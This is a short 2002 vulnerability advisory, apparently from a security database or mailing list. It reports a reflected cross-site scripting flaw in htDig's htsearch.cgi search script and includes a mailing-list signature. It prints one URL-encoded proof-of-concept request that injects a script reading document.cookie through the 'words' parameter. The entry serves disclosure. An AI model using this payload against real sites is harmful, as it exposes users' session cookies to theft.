XSS in HTDIG

2002-06-27T00:00:00
ID SECURITYVULNS:DOC:3143
Type securityvulns
Reporter Securityvulns
Modified 2002-06-27T00:00:00

Description

Eg;

http://www.anyhost.com/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

(all URLS must be on one line)

Apologies if this is a known issue. Apologies also for posting about XSS, too, but this is not an isolated website, but a commonly used service.

===== -----BEGIN GEEK CODE BLOCK----- Version: 3.1 www.geekcode.com GIT d--(---) s-:-- a-- C++++ UL@ P--- L++>+++ E---(-) W+++(-)$ N-(--) o-- K++ w(+)(-) O? !M ?V(-) PS+++@ PE-- Y+ PGP++ t+ 5-(++) X(+) R tv(--) b+>+++ DI++ D-(Quake+++) G+++ e* h r++>+++ y+(+++) -----END GEEK CODE BLOCK-----


Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com